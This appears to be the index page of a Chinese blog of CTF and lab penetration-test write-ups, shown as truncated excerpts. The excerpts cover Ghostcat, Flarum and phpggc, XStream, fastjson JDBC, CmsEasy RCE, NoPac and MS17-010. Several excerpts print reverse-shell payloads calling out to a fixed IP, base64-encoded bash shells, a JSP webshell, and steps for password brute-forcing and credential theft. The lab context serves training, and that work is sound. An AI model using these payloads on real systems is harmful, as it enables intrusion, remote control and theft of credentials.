ke1nys`Blog

先用fscan扫一下 就只扫到一个8080 8009端口和一个后台管理系统 其实搜一下就会发现这是个tomcat 访问8080端口的 发现是个纯静态网页 没啥用 直接开扫目录 访问docs目录 有洞 直接去找poc来打 https://github.com/00theway/Ghostcat-CNVD-2020-10487 1python3 ajpShooter.py http://39.99.248.175:8080/ 8009 /WEB-INF/web.xml read 发现有个UploadServlet路由 访问并且上传文件 12345678910<% java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuNDIuMzkuMTEwLzMzODkgMD4mMQ}|{base64,-d}|{bash,-i}").getIn ...

参考文章1 参考文章2 这里是准备讲讲PAC的一个攻击手法 NoPac 这里是在打春秋云镜的Spoofing遇到的 刚好借此机会来学习一下 (这里只讲原理 不操作 因为懒得搭建环境…………) 简介首先PAC呢 在我们学习这个kerberos 协议的时候就遇到这个 就是在我们申请TGT票据的时候生成的 因为我们在申请TGS票据的时候 是不会验证我们是否有权限来访问该服务的 验证是否有权限来访问该服务的时候在我们拿着ST去申请访问的时候 验证的话就是靠我们TGS票据里的PAC (TGS里的PAC是从TGT票据中复制过来的) 漏洞及漏洞原理CVE-2021-42278 & CVE-2021-42287 CVE-2021-42278， 机器用户应当是computer$的形式，但是实际并没有验证机器账号是否有$。导致机器用户名可以被模拟冒用。 CVE-2021-42287，Kerberos在处理UserName字段时，如果找不到 UserName 的话，KDC会继续查找 UserName$，如果还是查找不到的话，KDC会继续查找altSecurityIdentit ...

fscan先扫一波 一个80端口 这个登录的话是不需要进行验证码或者别的验证东西 所以我们可以进行爆破· 用那个rockyou.txt就行了 1administrator::1chris 爆破出密码后进行登录后台 这个cms的话其实就是跟题目给的名字是一样的 Flarum 直接去找洞就行了 这里用p牛的一篇文章来参考 https://tttang.com/archive/1714/#toc_0x02-css 先下载一个phpggc https://github.com/ambionics/phpggc 就是php版的yso 1./phpggc -p tar -b Monolog/RCE6 system "bash -c 'bash -i >& /dev/tcp/101.42.39.110/3389 0>&1'" 编译成功后会生成一大堆base64代码，复制过来，在后台修改css那里替换下面代码的xxx 1@import (inline) 'data:text/css;base64,xxx ...

fscan先扫一下ip 存在一个ftp匿名登录 1.txt中没有东西 pom.xml中有一个xstream的低版本漏洞 https://github.com/vulhub/vulhub/blob/master/xstream/CVE-2021-29505/README.zh-cn.md 在你的vps上开放1099端口，然后用yso起一下服务： 1java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuNDIuMzkuMTEwLzMzODkgMD4mMQ}|{base64,-d}|{bash,-i}" payload 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505 ...

PHP_unserialize_pro1234567891011121314151617181920212223242526272829303132333435363738394041<?php error_reporting(0); class Welcome{ public $name; public $arg = 'welcome'; public function __construct(){ $this->name = 'Wh0 4m I?'; } public function __destruct(){ if($this->name == 'A_G00d_H4ck3r'){ echo $this->arg; } } } ...

fscan先扫一波 8000端口有一个Lumia ERP 这里的话是存在一个弱口令的 admin/123456 用别的方法其实也行 存在一个信息泄露 于是登录后台 发现题目给了个JDBC的提示 于是查了一下 发现是fastjson的JDBC JDBC-fastjson 然后跟着来打就行了 先下载一个Mysql-Fake https://github.com/fnmsd/MySQL_Fake_Server 然后将yso.jar下载到这个MySQL文件夹里 并且修改config文件 1234567891011121314151617181920212223{ "config":{ "ysoserialPath":"ysoserial-all.jar", "javaBinPath":"java", "fileOutputDir":". ...

fscan开扫 扫描发现后台/admin 弱口令登录 admin/123456 在后台登录时就已经看到了这个cms的版本后 于是google一下 https://jdr2021.github.io/2021/10/14/CmsEasy_7.7.5_20211012 后台RCE 1234567891011121314151617POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1Host: 39.98.127.31Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,applicat ...

先占个坑 以后深入学习了 后面再写 https://www.freebuf.com/articles/es/214551.html https://www.cnblogs.com/Mikasa-Ackerman/p/Windows-zhu-ce-biao-de-xue-xi.html

常规操作 fscan开扫 只有一个win主机 并且这个win主机的话 是开启了mssql服务 并且使用了弱口令 MDUT登录 这条权限开启了 尝试土豆家族提权 然后上线CS 这里的话我是使用了spawn来派生到meterpreter https://blog.csdn.net/weixin_39190897/article/details/118353886 其实meterpreter的getsystem自带这个土豆提权 在拿到第一个flag的时候 提示我们看看域内有没有别的用户 于是我们使用别的命令进行查看 （等会我们偷下别人的图 因为懒的重置靶机重新打了） ** 因为我们获得了这个system权限 于是我们直接注入这个用户的rdp进程 上线后查看用户可以看到它存在共享文件 然后直接访问这个共享文件夹的文件 1shell type \\tsclient\c\credential.txt 1234567beacon> shell type \\tsclient\c\credential.txt[*] Tasked beacon to run: ty ...

这个靶机比较特殊 他是由三部分的flag组成一个完整的flag 漏洞都给扫出来了 直接去打就行了 直接去写马 然后反弹shell 然后sudo -l 发现了这个mysql可以利用来提权 上传个fscan扫一下内网 整理一下信息 172.22.1.2 DC域控主机 172.22.1.15 外网主机 getshell 172.22.1.18 3306 OA系统 172.22.1.21 域内主机 MS17 永恒之蓝 先给这个linux主机上msf先 成功上线 然后去使用stowaway挂个代理 既然说这个21这个台主机存在MS17 这里的话我是用kali下的msf打的 服务器上的话不知道为啥老是失败 12345proxychains4 msfconsoleuse exploit/windows/smb/ms17_010_eternalblueset payload windows/x64/meterpreter/bind_tcp_uuid //这个是个关键了 可以配合proxychains4本地使用set RHOSTS 172.22.1. ...